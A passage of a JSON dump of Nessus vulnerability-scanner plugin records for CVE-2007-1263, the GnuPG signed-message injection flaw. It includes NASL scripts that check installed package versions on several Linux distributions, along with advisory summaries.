"https://www.tenable.com/plugins/nessus/28027", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-432-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(28027);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2007-1263\");\n script_bugtraq_id(22757);\n script_xref(name:\"USN\", value:\"432-2\");\n\n script_name(english:\"Ubuntu 6.06 LTS / 6.10 : gnupg2, gpgme1.0 vulnerability (USN-432-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"USN-432-1 fixed a vulnerability in GnuPG. This update provides the\ncorresponding updates for GnuPG2 and the GPGME library.\n\nGerardo Richarte from Core Security Technologies discovered that when\ngnupg is used without --status-fd, there is no way to distinguish\ninitial unsigned messages from a following signed message. An attacker\ncould inject an unsigned message, which could fool the user into\nthinking the message was entirely signed by the original sender.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/432-2/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:gnupg-agent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:gnupg2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:gpgsm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libgpgme11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libgpgme11-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/11/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2007-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(6\\.06|6\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 6.06 / 6.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libgpgme11\", pkgver:\"1.1.0-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libgpgme11-dev\", pkgver:\"1.1.0-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"gnupg-agent\", pkgver:\"1.9.21-0ubuntu5.3\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"gnupg2\", pkgver:\"1.9.21-0ubuntu5.3\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"gpgsm\", pkgver:\"1.9.21-0ubuntu5.3\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"libgpgme11\", pkgver:\"1.1.2-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"libgpgme11-dev\", pkgver:\"1.1.2-2ubuntu0.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gnupg-agent / gnupg2 / gpgsm / libgpgme11 / libgpgme11-dev\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-17T12:43:57", "description": "From Red Hat Security Advisory 2007:0106 :\n\nUpdated GnuPG packages that fix a security issue are now available.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nGnuPG is a utility for encrypting data and creating digital\nsignatures.\n\nGerardo Richarte discovered that a number of applications that make\nuse of GnuPG are prone to a vulnerability involving incorrect\nverification of signatures and encryption. An attacker could add\narbitrary content to a signed message in such a way that a receiver of\nthe message would not be able to distinguish between the properly\nsigned parts of a message and the forged, unsigned, parts.\n(CVE-2007-1263)\n\nWhilst this is not a vulnerability in GnuPG itself, the GnuPG team\nhave produced a patch to protect against messages with multiple\nplaintext packets. Users should update to these erratum packages which\ncontain the backported patch for this issue.\n\nRed Hat would like to thank Core Security Technologies for reporting\nthis issue.", "edition": 24, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 3 / 4 : gnupg (ELSA-2007-0106)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-1263"], "modified": "2013-07-12T00:00:00", "cpe": ["cpe:/o:oracle:linux:3", "p-cpe:/a:oracle:linux:gnupg", "cpe:/o:oracle:linux:4"], "id": "ORACLELINUX_ELSA-2007-0106.NASL", "href": "https://www.tenable.com/plugins/nessus/67459", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2007:0106 and \n# Oracle Linux Security Advisory ELSA-2007-0106 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67459);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-1263\");\n script_bugtraq_id(22757);\n script_xref(name:\"RHSA\", value:\"2007:0106\");\n\n script_name(english:\"Oracle Linux 3 / 4 : gnupg (ELSA-2007-0106)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2007:0106 :\n\nUpdated GnuPG packages that fix a security issue are now available.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nGnuPG is a utility for encrypting data and creating digital\nsignatures.\n\nGerardo Richarte discovered that a number of applications that make\nuse of GnuPG are prone to a vulnerability involving incorrect\nverification of signatures and encryption. An attacker could add\narbitrary content to a signed message in such a way that a receiver of\nthe message would not be able to distinguish between the properly\nsigned parts of a message and the forged, unsigned, parts.\n(CVE-2007-1263)\n\nWhilst this is not a vulnerability in GnuPG itself, the GnuPG team\nhave produced a patch to protect against messages with multiple\nplaintext packets. Users should update to these erratum packages which\ncontain the backported patch for this issue.\n\nRed Hat would like to thank Core Security Technologies for reporting\nthis issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2007-March/000066.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2007-March/000072.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected gnupg package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:gnupg\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 3 / 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"gnupg-1.2.1-20\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"gnupg-1.2.1-20\")) flag++;\n\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"gnupg-1.2.6-9\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"gnupg-1.2.6-9\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gnupg\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-17T09:10:18", "description": "New gnupg packages are available for Slackware 9.0, 9.1, 10.0, 10.1,\n10.2, and 11.0 to fix security ramifications of incorrect gpg usage.", "edition": 24, "published": "2007-03-12T00:00:00", "title": "Slackware 10.0 / 10.1 / 10.2 / 11.0 / 9.0 / 9.1 : gnupg (SSA:2007-066-01)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-1263"], "modified": "2007-03-12T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:9.0", "cpe:/o:slackware:slackware_linux:9.1", "p-cpe:/a:slackware:slackware_linux:gnupg", "cpe:/o:slackware:slackware_linux:10.1", "cpe:/o:slackware:slackware_linux:10.0", "cpe:/o:slackware:slackware_linux:11.0", "cpe:/o:slackware:slackware_linux:10.2"], "id": "SLACKWARE_SSA_2007-066-01.NASL", "href": "https://www.tenable.com/plugins/nessus/24787", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2007-066-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(24787);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-1263\");\n script_xref(name:\"SSA\", value:\"2007-066-01\");\n\n script_name(english:\"Slackware 10.0 / 10.1 / 10.2 / 11.0 / 9.0 / 9.1 : gnupg (SSA:2007-066-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New gnupg packages are available for Slackware 9.0, 9.1, 10.0, 10.1,\n10.2, and 11.0 to fix security ramifications of incorrect gpg usage.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2007&m=slackware-security.449060\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?eea8dd99\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected gnupg package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:gnupg\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:11.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/03/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/03/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/03/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"9.0\", pkgname:\"gnupg\", pkgver:\"1.4.7\", pkgarch:\"i386\", pkgnum:\"1_slack9.0\")) flag++;\n\nif (slackware_check(osver:\"9.1\", pkgname:\"gnupg\", pkgver:\"1.4.7\", pkgarch:\"i486\", pkgnum:\"1_slack9.1\")) flag++;\n\nif (slackware_check(osver:\"10.0\", pkgname:\"gnupg\", pkgver:\"1.4.7\", pkgarch:\"i486\", pkgnum:\"1_slack10.0\")) flag++;\n\nif (slackware_check(osver:\"10.1\", pkgname:\"gnupg\", pkgver:\"1.4.7\", pkgarch:\"i486\", pkgnum:\"1_slack10.1\")) flag++;\n\nif (slackware_check(osver:\"10.2\", pkgname:\"gnupg\", pkgver:\"1.4.7\", pkgarch:\"i486\", pkgnum:\"1_slack10.2\")) flag++;\n\nif (slackware_check(osver:\"11.0\", pkgname:\"gnupg\", pkgver:\"1.4.7\", pkgarch:\"i486\", pkgnum:\"1_slack11.0\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-12T10:06:09", "description": "This updates GnuPG to version 1.4.7, changing the default behavior so\nthat gnupg now flags message streams which contain multiple plaintexts\nas an error. This prevents errors which would occur when applications\nwhich called gnupg assumed that this was already the default behavior.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "published": "2007-03-16T00:00:00", "title": "Fedora Core 6 : gnupg-1.4.7-2 (2007-315)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-1263"], "modified": "2007-03-16T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora_core:6", "p-cpe:/a:fedoraproject:fedora:gnupg", "p-cpe:/a:fedoraproject:fedora:gnupg-debuginfo"], "id": "FEDORA_2007-315.NASL", "href": "https://www.tenable.com/plugins/nessus/24821", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2007-315.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(24821);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2007-1263\");\n script_xref(name:\"FEDORA\", value:\"2007-315\");\n\n script_name(english:\"Fedora Core 6 : gnupg-1.4.7-2 (2007-315)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This updates GnuPG to version 1.4.7, changing the default behavior so\nthat gnupg now flags message streams which contain multiple plaintexts\nas an error. This prevents errors which would occur when applications\nwhich called gnupg assumed that this was already the default behavior.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2007-March/001553.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6df9da4a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected gnupg and / or gnupg-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gnupg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gnupg-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/03/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 6.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC6\", reference:\"gnupg-1.4.7-2\")) flag++;\nif (rpm_check(release:\"FC6\", reference:\"gnupg-debuginfo-1.4.7-2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gnupg / gnupg-debuginfo\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-17T14:44:16", "description": "When printing a text stream with a GPG signature it was possible for\nan attacker to create a stream with 'unsigned text, signed text' where\nboth unsigned and signed text would be shown without distinction which\none was signed and which part wasn't.\n\nThis is tracked by the Mitre CVE ID CVE-2007-1263.\n\nThe update introduces a new option\n\n--allow-multiple-messages to print out such messages in the future, by\ndefault it only prints and handles the first one.", "edition": 25, "published": "2007-10-17T00:00:00", "title": "openSUSE 10 Security Update : gpg (gpg-2995)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-1263"], "modified": "2007-10-17T00:00:00", "cpe": ["cpe:/o:novell:opensuse:10.2", "p-cpe:/a:novell:opensuse:gpg", "cpe:/o:novell:opensuse:10.1"], "id": "SUSE_GPG-2995.NASL", "href": "https://www.tenable.com/plugins/nessus/27248", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update gpg-2995.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(27248);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-1263\");\n\n script_name(english:\"openSUSE 10 Security Update : gpg (gpg-2995)\");\n script_summary(english:\"Check for the gpg-2995 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"When printing a text stream with a GPG signature it was possible for\nan attacker to create a stream with 'unsigned text, signed text' where\nboth unsigned and signed text would be shown without distinction which\none was signed and which part wasn't.\n\nThis is tracked by the Mitre CVE ID CVE-2007-1263.\n\nThe update introduces a new option\n\n--allow-multiple-messages to print out such messages in the future, by\ndefault it only prints and handles the first one.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected gpg package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:gpg\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.1|SUSE10\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.1 / 10.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.1\", reference:\"gpg-1.4.2-23.16\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"gpg-1.4.5-24.4\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gpg\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-17T13:05:47", "description": "Updated GnuPG packages that fix a security issue are now available for\nRed Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nGnuPG is a utility for encrypting data and creating digital\nsignatures.\n\nGerardo Richarte discovered that a number of applications that make\nuse of GnuPG are prone to a vulnerability involving incorrect\nverification of signatures and encryption. An attacker could add\narbitrary content to a signed message in such a way that a receiver of\nthe message would not be able to distinguish between the properly\nsigned parts of a message and the forged, unsigned, parts.\n(CVE-2007-1263)\n\nWhilst this is not a vulnerability in GnuPG itself, the GnuPG team\nhave produced a patch to protect against messages with multiple\nplaintext packets. Users should update to these erratum packages which\ncontain the backported patch for this issue.\n\nRed Hat would like to thank Core Security Technologies for reporting\nthis issue.", "edition": 27, "published": "2007-05-25T00:00:00", "title": "RHEL 5 : gnupg (RHSA-2007:0107)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-1263"], "modified": "2007-05-25T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:gnupg"], "id": "REDHAT-RHSA-2007-0107.NASL", "href": "https://www.tenable.com/plugins/nessus/25320", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0107. The text \n# itself is copyright (C) Red Hat, 